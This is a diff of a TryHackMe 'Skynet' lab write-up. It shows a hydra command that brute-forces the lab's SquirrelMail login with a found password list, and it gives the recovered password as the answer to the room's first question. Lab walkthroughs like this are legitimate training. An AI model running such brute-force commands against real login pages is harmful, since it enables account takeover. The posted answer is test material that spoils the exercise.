JcmniaCS/TryHackMe/Skynet/README.md

 Apparently a recent malfunction has caused passwords to be changed, we also get the name "Miles Dyson" A possible username?<br />
 cat log1.txt<br />
 SCREENSHOT9<br />
 log1.txt looks like it's full of passwords or usernames.
-Maybe we could try the possible username "miles" or "milesdyson" with this password list?<br />
+Maybe we could try the possible username "Miles" or "MilesDyson" with this password list?
-I see there's nothing inside of the log2.txt and log3.txt so I remove those.<br />
+I see there's nothing inside of the log2.txt and log3.txt so I remove those.<br /></p>

+<p>Let's try bruteforcing the user "Miles" with the passwords we got from "log1.txt" on the squirrelmail service.
+We know there's a vulnerability in the SquirrelMail service with an available exploit.
+To do this we will use hydra< br/>
+hydra -l Miles -P log1.txt 10.10.90.192 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user:H=Cookie: squirrelmail_language=en_US; SQMSESSID=jbgcof2ofcgqh0jb5ukapj8pu3;"<br />
+Success!
+We have successfuly logged in with the password "cyborg007haloterminator"
 </p>

-Question 1:
+Question 1:<br />
-**What is Miles password for his emails?**
+**What is Miles password for his emails?** - cyborg007haloterminator